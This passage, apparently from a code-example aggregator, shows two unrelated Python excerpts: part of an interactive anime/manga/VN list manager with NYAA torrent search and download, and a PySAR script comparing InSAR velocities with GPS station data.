                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default
                    ).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]
                            eid = malanime['id']
                            etype = entry_type
                            accepted = True
            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                    'vn', 'basic,details', '(id=' + str(eid) + ')', '')\
                    ['items'][0]
                print(COLORS.header + 'Fetching image, please stand by...' +\
				COLORS.default)
                utils.showImage(
                deep[('image_url' if etype != 'vn' else 'image')])
        
        elif cmdsplit[0].lower() in ['s', 'sort']:
            if len(cmdsplit) != 4:
                print('Invalid number of arguments')
                print('Must be:')
                print('	(s)ort [(s)wap/(m)ove] [index] [index]')
                print('')
                print('When moving, first index should be "from entry" and' +\
				'second index should be "to entry"')
                continue

            if (cmdsplit[2].isdigit() == False) or\
			(cmdsplit[3].isdigit() == False):
                print(COLORS.fail + 'Indexes must be digits' + COLORS.default)
                continue

            if cmdsplit[1].lower() in ['swap', 's']:
                # Swap ids
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[2])]['id'] = int(cmdsplit[3])
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[3])]['id'] = int(cmdsplit[2])

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Save
                dbs[currentdb].save()
            elif cmdsplit[1].lower() in ['move', 'm']:
                # Fool ids
                dbs[currentdb].dictionary['items'][int(cmdsplit[2])][
                    'id'] = float(str(int(cmdsplit[3]) - 1) + '.5')

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Rebuild ids now that we have them in order
                rebuild_ids(dbs[currentdb])

            else:
                print(COLORS.warning + 'Usage: (s)ort [(s)wap/(m)ove]' +\
                '[index] [index]' + COLORS.default)
                continue

        elif cmdsplit[0].lower() in ['info', 'i']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            if entry['type'].lower() in ['anime', 'manga']:
                if entry['type'].lower() == 'anime':
                    t_label = 'Last watched'
                else:
                    t_label = 'Last chapter/volume read'
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], t_label:
                           entry['lastwatched'], 'Status':
                           utils.translated_status[entry['type']][entry[
                           'status'].lower()]}
            elif entry['type'].lower() == 'vn':
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], 'Status':
                            utils.translated_status[entry['type']][entry[
                            'status'].lower()]}

            for k in toprint:
                if os.name != 'nt':
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    str(toprint[k]))
                else:
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    toprint[k].encode('ascii', 'ignore'))

        elif cmdsplit[0].lower() in ['edit', 'e']:
            # INTRO I
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            # INTRO II
            if os.name != 'nt':
                n_name = input(
                    '<Name> [' + entry['name'].encode('utf8') + '] ').replace(
                    '\n', '')
            else:
                n_name = input(
                    '<Name> [' + entry['name'].encode('ascii', 'ignore') + '] '
                    ).replace('\n', '')

            if entry['type'].lower() != 'vn':
                n_genre = input(
                    '<Genre> [' + entry['genre'].decode('utf8') + '] '
                    ).replace('\n', '')
            else:
                n_genre = ''

            # ZIGZAGGING
            n_lw = None
            n_status = None
            if entry['type'] == 'anime':
                n_status = "placeholder"
                while (n_status in ['w', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [W/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                n_lw = input(
                    '<Last episode watched> [' + entry['lastwatched'] +\
                    ']>'.replace('\n', ''))
            elif entry['type'] == 'manga':
                n_status = "placeholder"
                while (n_status in ['r', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [R/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'r':
                    n_status = 'w'
                n_lw = input(
                    '<Last page/chapter read> [' + entry['lastwatched'] +\
                    ']> ').replace('\n', '')
            elif entry['type'] == 'vn':
                n_status = "placeholder"
                while (n_status in ['p', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [P/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'p':
                    n_status = 'w'
                n_lw = ''

            # EXTENDED SINGLE NOTE
            n_obs = input('<Observations> [' + entry['obs'] + ']> ')

            # BEGIN THE SOLO
            if n_name == '':
                n_name = entry['name']
            dbs[currentdb].dictionary['items'][int(args)]['name'] =\
            utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_name))
            if n_genre == '' and entry['type'].lower() != 'vn':
                n_genre = entry['genre']
            if entry['type'].lower() != 'vn':
                dbs[currentdb].dictionary['items'][int(args)]['genre'] =\
                utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_genre))
            if n_status != None:
                if n_status == '':
                    n_status = entry['status']
                dbs[currentdb].dictionary['items'][
                    int(args)]['status'] = n_status
                if n_lw == '':
                    n_lw = entry['lastwatched']
                dbs[currentdb].dictionary['items'][
                    int(args)]['lastwatched'] = n_lw
            if n_obs == '':
                n_obs = entry['obs']
            dbs[currentdb].dictionary['items'][int(args)]['obs'] = n_obs

            # Peaceful end
            dbs[currentdb].save()
            print(COLORS.green + 'Done' + COLORS.default)
            continue
        elif cmdsplit[0].lower() in ['n', 'NYAA']:
            if args.isdigit():
                if args >= 0 and\
                len(dbs[currentdb].dictionary['items']) >= int(args):
                    term = dbs[currentdb].dictionary[
                        'items'][int(args)]['name']

                    if dbs[currentdb].dictionary['items'][int(args)]['type'\
                    ].lower() == 'anime':
                        if dbs[currentdb].dictionary['items'][int(args)][\
                        'status'].lower() == 'c':
                            if dbs[currentdb].dictionary['items'][int(args)][\
                            'lastwatched'].isdigit():
                                choice = ''
                                while (choice in ['y', 'n']) == False:
                                    choice = input(COLORS.bold +\
	                                'Do you want to search for the next' +\
                                     'episode (' + str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1) +\
                                        ')? [Y/n] ' + COLORS.default).lower()
                                    if choice.replace('\n', '') == '':
                                        choice = 'y'

                                if choice == 'y':
                                    new_lw = str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1)
                                    if len(str(new_lw)) == 1:
                                        new_lw = '0' + new_lw
                                    term = term + ' ' + new_lw

                else:
                    print(COLORS.fail + 'The entry ' + args +\
                    ' is not on the list' + COLORS.default)
                    continue
            else:
                term = args

            print(COLORS.header + 'Searching NYAA.eu for "' + term +\
            '"...' + COLORS.default)
            search_results = NYAA.search(term)
            print('')

            if len(search_results) == 0:
                print(COLORS.fail + 'No results found' + COLORS.default)
                continue

            i = 0
            for result in search_results[:15]:
                if os.name != 'nt':
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                else:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'].encode('ascii', 'ignore'))
                i += 1
            print('[C] Cancel')

            has_picked = False
            while has_picked == False:  # Ugly I know
                which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                if which.lower() == 'c':
                    break

                if which.isdigit():
                    if int(which) <= len(search_results) and int(which) <= 15:
                        picked = search_results[int(which)]
                        has_picked = True

            if has_picked:
                print('')
                if os.name == 'nt':
                    for key in picked:
                        picked[key] = picked[key].encode('ascii', 'ignore')
                print(COLORS.bold + '<Title> ' + COLORS.default +\
                picked['title'])
                print(COLORS.bold + '<Category> ' + COLORS.default +\
                picked['category'])
                print(COLORS.bold + '<Info> ' + COLORS.default +\
                picked['description'])
                print(COLORS.bold + '<URL> ' + COLORS.default + picked['url'])

                print('')
                choice = ''
                while (choice in ['t', 'd', 'n', 'r']) == False:
                    print(COLORS.bold + '[T] ' + COLORS.default +\
                    'Download .torrent file')
                    print(COLORS.bold + '[D] ' + COLORS.default +\
                    'Download all files (simple torrent client)')
                    print(COLORS.bold + '[R] ' + COLORS.default +\
                    'Load and start on rTorrent (xmlrpc)')
                    print(COLORS.bold + '[N] ' + COLORS.default +\
                    'Do nothing')
                    choice = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).lower()

                if choice == 'r':
                    if os.name == 'nt':
                        print(COLORS.fail + 'Not available on Windows' +\
                        COLORS.default)
                        continue

                    try:
                        server = rtorrent_xmlrpc.SCGIServerProxy(
                            'scgi://localhost:5000/')
                        time.sleep(1)
                        server.load_start(picked['url'])
                        time.sleep(.5)
                        print(COLORS.green + 'Success' + COLORS.default)
                    except:
                        print(COLORS.fail + 'Error while connecting or adding'+\
                        'torrent to rTorrent' + COLORS.default)
                        print(COLORS.warning + 'ATTENTION: for this to work' +\
                        'you need to add the following line to ~/.rtorrent.rc:')
                        print('\tscgi_port = localhost:5000')
                        print('')
                        print('And rTorrent needs to be running' +\
                        COLORS.default)
                        continue
                elif choice == 't':
                    metadata = urlopen(picked['url']).read()

                    while True:
                        filepath = input(
                            COLORS.bold + 'Save to> ' +\
                            COLORS.default).replace('\n', '')
                        try:
                            metadata_file = open(filepath, 'wb')
                            metadata_file.write(metadata)
                            metadata_file.close()
                        except IOError as error:
                            print(COLORS.fail + 'Failed to save file' +\
                            COLORS.default)
                            print(COLORS.fail + 'Exception! ' + str(error) +\
                            COLORS.default)
                            print('Retrying...')
                            print('')
                            continue
                        break

                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][
                            int(args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(
                                    int(dbs[currentdb].dictionary['items'][
                                    int(args)]['lastwatched']) + 1)
                                dbs[currentdb].save()

                if choice == 'd':
                    try:
                        import libtorrent as lt
                    except ImportError:
                        print(COLORS.fail +\
                        'libTorrent Python bindings not found!' +\
                        COLORS.default)
                        print('To install it check your distribution\'s' +\
                        ' package manager (python-libtorrent for Debian' +\
                        ' based ones) or compile libTorrent with the' +\
                        '--enable-python-binding')
                        continue

                    print(COLORS.header + 'Downloading to current folder...' +\
                    COLORS.default)

                    ses = lt.session()
                    ses.listen_on(6881, 6891)
                    decoded = lt.bdecode(urlopen(picked['url']).read())
                    info = lt.torrent_info(decoded)
                    torrent_handle = ses.add_torrent(info, "./")

                    while (not torrent_handle.is_seed()):
                        status = torrent_handle.status()

                        state_str = [
                            'queued', 'checking', 'downloading metadata',
                            'downloading', 'finished', 'seeding', 'allocating',
                            'checking resume data']
                        sys.stdout.write(
                            '\r\x1b[K%.2f%% complete (down: %.1f kb/s up:' +\
							'%.1f kB/s peers: %d) %s' %
                            (status.progress * 100, status.download_rate / 1000,
                             status.upload_rate / 1000,
                            status.num_peers, state_str[status.state]))
                        sys.stdout.flush()

                        time.sleep(1)
                    print('')
                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][int(
                            args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(int(dbs[currentdb
                                ].dictionary['items'][int(args)][
                                'lastwatched']) + 1)
                                dbs[currentdb].save()

        elif cmdsplit[0].lower() in ['o', 'oinfo']:
            accepted = False
            if args.split(' ')[0].isdigit():
                if (int(args.split(' ')[0]) >= 0) and (len(dbs[currentdb].dictionary['items']) >= int(args.split(' ')[0])):
                    eid = dbs[currentdb].dictionary['items'][int(args.split(' ')[0])]['aid']
                    etype = dbs[currentdb].dictionary[
                        'items'][int(args.split(' ')[0])]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args.split(' ')[0] +\
                    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                        COLORS.bold + '<Anime, Manga or VN> ' +\
                        COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, True)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii', 'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' +\
                        COLORS.default).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]

                            eid = malanime['id']
                            etype = entry_type
                            accepted = True

            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                        'vn', 'basic,details', '(id=' + str(eid) + ')', '')[
                        'items'][0]

                if os.name == 'nt':
                    for key in deep:
                        deep[key] = deep[key].encode('ascii', 'ignore')

                if etype == 'anime':
                    alternative_title = (' (' + deep['other_titles'].get('japanese') + ')' \
                        if deep['other_titles'].get('japanese', '') != '' \
                        else '') if isinstance(deep['other_titles'].get('japanese', ''), str) \
                        else (' (' + '/'.join(deep['other_titles'].get('japanese', [])) + ')' if \
                        len(deep['other_titles'].get('japanese', [])) > 0 else '')
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'] + alternative_title)
                    if deep['end_date'] != None:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ' + deep['end_date'])
                    else:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ongoing')
                    print(COLORS.bold + 'Type: ' + COLORS.default + deep['type'])
                    if deep.get('classification', None) != None:
                        print(COLORS.bold + 'Classification: ' + COLORS.default +\
                        deep['classification'])
                    print(COLORS.bold + 'Episodes: ' + COLORS.default +\
                    str(deep['episodes']))
                    if deep.get('synopsis', None) != None:
                        print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                        utils.remove_html_tags(deep['synopsis']))
                    print(COLORS.bold + 'Picture available: ' + COLORS.default + \
                        ('yes' if deep['image_url'] != '' else 'no'))
                    print('')
                    if len(deep['OPsongs']) > 0:
                        print(COLORS.bold + 'Opening' + \
                            ('s' if len(deep['OPsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['OPsongs'][0])
                        for song in deep['OPsongs'][1:]: 
                            print((' ' * 10) + song)

                    if len(deep['EDsongs']) > 0:
                        print(COLORS.bold + 'Ending' + \
                            ('s' if len(deep['EDsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['EDsongs'][0])
                        for song in deep['EDsongs'][1:]:
                            print((' ' * 9) + song)
                    print('')
                    print(COLORS.bold + 'Studio' +\
                        ('s' if len(deep['credit']) > 1 else '') + ': ' + \
                        COLORS.default + (' / '.join(deep['credit'])))
                    print('')
                    print(COLORS.bold + 'Character list:' + COLORS.default)
                    for character in deep['characters']:
                        print('\t' + character + ' (voiced by ' + \
                            deep['characters'][character] + ')')
                    print('')
                    print(COLORS.bold + 'Episode list:' + COLORS.default)
                    for ep in sorted(deep['episode_names'], key=lambda x: int(x)):
                        print('\t #' + ep + ' ' + \
                            deep['episode_names'][ep])
                    print('')
                    print(COLORS.bold + 'Staff list:' + COLORS.default)
                    if '--full' in cmdsplit:
                        amount = len(deep['staff'])
                    else: amount = 7
                    i = 0
                    for staff in deep['staff']:
                        print('\t' + staff + ' (' + deep['staff'][staff] + ')')
                        i += 1
                        if i >= amount and len(deep['staff']) > amount:
                            print(COLORS.bold + '\tThere are ' + str(len(deep['staff']) - amount) + \
                             ' other staff members, use "' + COLORS.default + cmd + ' --full"' +\
                             COLORS.bold + ' to see more')
                            break

                elif etype == 'manga':
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'])
                    print(COLORS.bold + 'Chapters: ' + COLORS.default +\
                    str(deep['episodes']))
                    print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                    utils.HTMLEntitiesToUnicode(
                     utils.remove_html_tags(deep['synopsis'])))
                elif etype == 'vn':
                    if len(deep['aliases']) == 0:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'])
                    else:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'] + ' [' +\
                        deep['aliases'].replace('\n', '/') + ']')
                        platforms = []
                    for platform in deep['platforms']:
                        names = {
                            'lin': 'Linux', 'mac': 'Mac', 'win': 'Windows'}
                        if platform in names:
                            platform = names[platform]
                        else:
                            platform = platform[0].upper() + platform[1:]
                        platforms.append(platform)
                    print(COLORS.bold + 'Platforms: ' + COLORS.default +\
                    ('/'.join(platforms)))
                    print(COLORS.bold + 'Released: ' + COLORS.default +\
                    deep['released'])
                    print(COLORS.bold + 'Languages: ' + COLORS.default +\
                    ('/'.join(deep['languages'])))
                    print(COLORS.bold + 'Description: ' + COLORS.default +\
                    deep['description'])

                print('')

        elif cmdsplit[0].lower() in ['add', 'a']:
            online = False
            repeat = True
            title = ''
            entry_type = ''
            while repeat:
                repeat = False
                if title == '':
                    while title == '':
                        title = input(
                            COLORS.bold + '<Title> ' + COLORS.default).replace('\n', '')
                    entry_type = ''
                    while (entry_type in ['anime', 'manga', 'vn']) == False:
                        entry_type = input(
                            COLORS.bold + '<Anime, Manga or VN> ' +\
                            COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, online)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                i = 0
                for result in search_results:
                    if os.name != 'nt':
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'])
                    else:
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'].encode('ascii', 'ignore'))
                    i += 1
                if len(search_results) == 0:
                    print('No results found, searching online..')
                    online = True
                    repeat = True
                    continue

                if not online:
                    print(COLORS.bold + '[O] ' + COLORS.default + 'Search online')
                print(COLORS.bold + '[C] ' + COLORS.default + 'Cancel')
                accepted = False
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                    if which.lower() == 'o':
                        online = True
                        repeat = True
                        accepted = True
                    elif which.lower() == 'c':
                    	print('')
                    	accepted = True
                    elif which.isdigit():
                        if int(which) <= len(search_results):
                            search_picked = search_results[int(which)]
                            if entry_type in ['anime', 'manga']:
                                deep = ANN.details(search_picked['id'], entry_type)
                            elif entry_type == 'vn':
                                deep = VNDB.get(
                                    'vn', 'basic,details', '(id=' +\
                                     str(search_picked['id']) + ')', '')['items'][0]
                            accepted = True

            if which.lower() == 'c': continue
            genre = ''
            if which == 'n':
                genre = input(
                    COLORS.bold + '<Genre> ' + COLORS.default).replace('\n', '')
            elif entry_type != 'vn':
                genres = ''
                for genre in deep['genres']:
                    genres = genres + genre + '/'
                genre = genres[:-1]

            if which != 'n':
                title = deep['title']

            status = ''
            while (status in ['c', 'w', 'h', 'q', 'd']) == False:
                status = input(COLORS.bold + '<Status> ' + COLORS.default +
                                   COLORS.header + '[C/W/H/Q/D] ' +\
                                   COLORS.default).lower()[0]

            if status != 'w' and entry_type != 'vn':
                last_ep = input(
                    COLORS.bold + '<Last episode watched> ' +\
                    COLORS.default).replace('\n', '')
            else:
                if entry_type == "anime":
                    last_ep = str(deep['episodes'])
                elif entry_type == "manga":
                    last_ep = str(deep['episodes'])
                else:
                    last_ep = ''

            obs = input(
                COLORS.bold + '<Observations> ' +\
                COLORS.default).replace('\n', '')

            try:
                dbs[currentdb].dictionary['count'] += 1
            except AttributeError:
                dbs[currentdb].dictionary['count'] = 1
            dbs[currentdb].dictionary['items'].append({'id': dbs[currentdb
             ].dictionary['count'], 'type': entry_type,
             'aid': search_picked['id'],
             'name': utils.HTMLEntitiesToUnicode(
              utils.remove_html_tags(title)), 'genre':
	          utils.HTMLEntitiesToUnicode(utils.remove_html_tags(genre)),
              'status': status, 'lastwatched': last_ep, 'obs': obs})
            rebuild_ids(dbs[currentdb])
            print(COLORS.green + 'Entry added' + COLORS.default + '\n')
        elif cmdsplit[0] == '':
            continue
        else:
            print(COLORS.warning + 'Command not recognized' + COLORS.default)
            continue

Example 45

Project: PySAR
Source File: insar_vs_gps.py
View license
def main(argv):

   annotation='yes'
   ann_x=0
   ann_y=0
   annotation_Color='green'
   disp_velocity='yes'
   GPS_InSAR_dif_thr=1
   gps_comp='los_3D'
   uncertainty_fac=1.0
   MarkerSize=5
   try:
      opts, args = getopt.getopt(argv,"v:r:g:G:l:c:t:m:M:s:S:A:B:C:x:y:I:H:u:")

   except getopt.GetoptError:
      Usage() ; sys.exit(1)

   for opt,arg in opts:

      if opt == '-v':
        velocityFile = arg
      elif opt == '-s':
        velocityFile2 = arg
      elif opt == '-g':
        gpsFile = arg
      elif opt == '-r':
        refStation = arg
      elif opt == '-l':
        stationsList = arg.split(',')
      elif opt == '-c':
        coherenceFile = arg
      elif opt == '-t':
        thr = float(arg)
      elif opt == '-m':
        minV=float(arg)
      elif opt == 'M':
        maxV=float(arg)
      elif opt == '-S':
        gps_source = arg
      elif opt == '-A':
        annotation = arg
      elif opt == '-C':
        annotation_Color = arg
      elif opt == '-x':
        ann_x = float(arg)
      elif opt == '-y':
        ann_y = float(arg)
      elif opt == '-I':
        theta = float(arg)
      elif opt == '-H':
        heading = float(arg)
      elif opt == '-G':
        gps_comp = arg
      elif opt == '-u':
        uncertainty_fac = float(arg)
      elif opt == '-B':
        MarkerSize = float(arg)

   try:
     velocityFile
     gpsFile 
     refStation
   except:
     Usage();sys.exit(1)

   try:
     thr
   except:
     thr=0.9

   
   h5file = h5py.File(velocityFile,'r')
   dset=h5file['velocity'].get('velocity')
   insarData=dset[0:dset.shape[0],0:dset.shape[1]]
   k=h5file.keys()

   try:
     h5file2 = h5py.File(velocityFile2,'r')
     dset2=h5file2['velocity'].get('velocity')
     insarData2=dset2[0:dset2.shape[0],0:dset2.shape[1]]
   except:
     print ''
  
   ullon=float(h5file[k[0]].attrs['X_FIRST'])
   ullat=float(h5file[k[0]].attrs['Y_FIRST'])
   lon_step=float(h5file[k[0]].attrs['X_STEP'])
   lat_step=float(h5file[k[0]].attrs['Y_STEP'])
   lon_unit=h5file[k[0]].attrs['Y_UNIT']
   lat_unit=h5file[k[0]].attrs['X_UNIT']

   Length,Width = np.shape(insarData)

   lllat=ullat+Length*lat_step
   urlon=ullon+Width*lon_step
   lat=np.arange(ullat,lllat,lat_step)
   lon=np.arange(ullon,urlon,lon_step)
#################################################################################################
# finding the raw an column of the reference gps station and referencing insar data to this pixel
   Stations,Lat,Lon,Ve,Se,Vn,Sn,Vu,Su=readGPSfile(gpsFile,gps_source)
   idxRef=Stations.index(refStation)
  # Length,Width=np.shape(insarData)
 #  lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
   IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)

#############################################
 #  Stations, gpsData = redGPSfile(gpsFile)
 #  idxRef=Stations.index(refStation)
 #  Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
 #  IDYref,IDXref=find_row_column(Lon,Lat,lon,lat,lon_step,lat_step)   
  ###################################################
 
   if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
        print ''
        print '-----------------------------------------------------------------------'
        print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)       
        if not np.isnan(insarData[IDYref][IDXref]):
             insarData=insarData - insarData[IDYref][IDXref]
        else:
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: nan value for InSAR data at the refernce pixel!
               reference station should be a pixel with valid value in InSAR data.
                               
               please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
   else:
        print 'WARNING:'
        print 'Reference GPS station is out of the area covered by InSAR data'
        print 'please select another GPS station as the reference station.'
        sys.exit(1)

#######################################################################################
    
   try:
      stationsList
   except:
      stationsList = Stations 
     # stationsList.remove(refStation)

  # theta=23.0*np.pi/180.0
  # heading=193.0*np.pi/180.0
   try:
      print 'incidence angle = ' + str(theta)
   except:
      print 'using look angle from the velocity file. For more precise results input the incidence angle using option -I.'
      look_n=float(h5file['velocity'].attrs['LOOK_REF1'])
      look_f=float(h5file['velocity'].attrs['LOOK_REF2'])
      theta=(look_n+look_f)/2.
      print 'incidence angle = ' + str(theta) 
  
   try:
      print 'Heading angle = '+str(heading)
   except:
      heading = float(h5file['velocity'].attrs['HEADING'])
      if heading < 0:
          heading=heading+360 

   theta=theta*np.pi/180.0
   heading=heading*np.pi/180.0

   if gps_comp in ['los_3D','LOS_3D','los_3d']:
      unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),-np.cos(theta)]
      gps_comp_txt=' projecting three gps components to LOS' 
   elif gps_comp in ['los_Hz','LOS_HZ','los_hz','los_HZ','LOS_hz']:
      unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]
      gps_comp_txt=' projecting horizontal gps components to LOS'
   elif gps_comp in ['LOS_UP','los_Up','los_up','LOS_up']:
      unitVec=[0,0,-np.cos(theta)]
      gps_comp_txt=' projecting vertical gps components to LOS'
   elif gps_comp in ['gps_up','GPS_UP','GPS_Up','gps_Up']:
      unitVec=[0,0,1]
      gps_comp_txt=' comparing veryical gps with InSAR'
      print '-------------------------'
      print 'Projecting InSAR to vertical'
      insarData=-insarData/np.cos(theta)      
   print '-------------------------'
   print 'unit vector for :' + gps_comp_txt
   print unitVec
   print '-------------------------'
   gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]+unitVec[2]*Vu[idxRef]
   Sr= ((unitVec[0]**2)*Se[idxRef]**2+(unitVec[1]**2)*Sn[idxRef]**2+(unitVec[2]**2)*Su[idxRef]**2)**0.5

  # Sr=((Se[idxRef]**2)*(np.sin(theta)*np.cos(heading))**2+(Sn[idxRef]**2)*(np.sin(heading)*np.sin(theta))**2+(Su[idxRef]**2)*(np.cos(theta)**2))**0.5
   print '######################################################################'
   try:
      h5coh = h5py.File(coherenceFile)
      kh5coh=h5coh.keys()
      dset=h5coh[kh5coh[0]].get(kh5coh[0])
      Coh=dset[0:dset.shape[0],0:dset.shape[1]]
   except:
      print 'No information about the coherence of the points'

   InSAR=[]
   GPS=[]
   InSAR1=[]
   GPS1=[]
   InSAR2=[]
   GPS2=[]
   coherence=[]
   GPSx=[]
   GPSy=[]
   GPSx1=[]
   GPSy1=[]
   GPSx2=[]
   GPSy2=[]
   GPS_station=[]
   GPS_std=[]
   for st in stationsList:
   
      try :
        
        idx=Stations.index(st)

       # Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idx,:]
        gpsLOS=unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]+unitVec[2]*Vu[idx]
        Sg= ((unitVec[0]**2)*Se[idx]**2+(unitVec[1]**2)*Sn[idx]**2+(unitVec[2]**2)*Su[idx]**2)**0.5
       # Sg=((Se[idx]**2)*(np.sin(theta)*np.cos(heading))**2+(Sn[idx]**2)*(np.sin(heading)*np.sin(theta))**2+(Su[idx]**2)*(np.cos(theta)**2))**0.5
        S=(Sg**2+Sr**2)**0.5
        gpsLOS=gpsLOS-gpsLOS_ref
        IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
        insar_velocity=-insarData[IDY][IDX]
        
        try: 
           gpsLOS=insarData2[IDY][IDX]-insarData2[IDYref][IDXref]
           gpsLOS=-1000.0*gpsLOS
        except:
           InSAR_GPS_Copmarison='yes'


        if not np.isnan(insarData[IDY][IDX]):

           print '%%%%%%%%%%%%%%%%%%%%'
           print st
           print 'GPS: ' + str(gpsLOS) + '  +/- '+str(S)  
           print 'INSAR: '+ str(-insarData[IDY][IDX]*1000.0)
           try:
              print 'Coherence: ' + str(Coh[IDY][IDX])
              coherence.append(Coh[IDY][IDX])
              if Coh[IDY][IDX]>thr:
                  InSAR1.append(-insarData[IDY][IDX]*1000.0)
                  GPS1.append(gpsLOS)
              else:
                  InSAR2.append(-insarData[IDY][IDX]*1000.0)
                  GPS2.append(gpsLOS)
                  
           except:
              print 'No information about the coherence is available!'
   
           InSAR.append(-insarData[IDY][IDX]*1000.0)
           GPS.append(gpsLOS)
           GPS_station.append(st)
           GPSx.append(IDX)
           GPSy.append(IDY)
           GPS_std.append(S)
